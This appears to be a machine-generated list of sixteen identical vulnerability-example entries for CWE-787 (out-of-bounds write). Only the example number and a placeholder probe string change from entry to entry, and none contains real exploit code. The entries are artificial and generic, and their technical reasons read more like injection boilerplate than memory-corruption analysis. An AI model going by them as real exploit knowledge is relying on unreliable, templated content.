[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 35

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-35-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 36

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-36-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 37

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-37-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 38

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-38-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 39

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-39-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 40

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-40-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 41

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-41-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 42

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-42-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 43

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-43-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 44

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-44-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 45

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-45-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 46

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-46-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 47

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-47-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 48

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-48-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 49

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-49-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]

Example 50

Target context: Enterprise service with CWE-787 (Out-of-bounds Write) exposure in a production-like path.
Vulnerable condition: Input trust is assumed before strict boundary/control validation.
Exploit input/payload: 787-probe-50-alpha (mutate encoding, size, and control characters for environment-specific bypass testing).
Expected attacker-visible result: Unauthorized behavior, data/control impact, or integrity break aligned with this weakness class.
Technical reason: Application logic reaches a dangerous sink without adequate normalization, canonicalization, and safety guards.

[attacker input] -> [parser/validator gap] -> [unsafe sink] -> [security impact]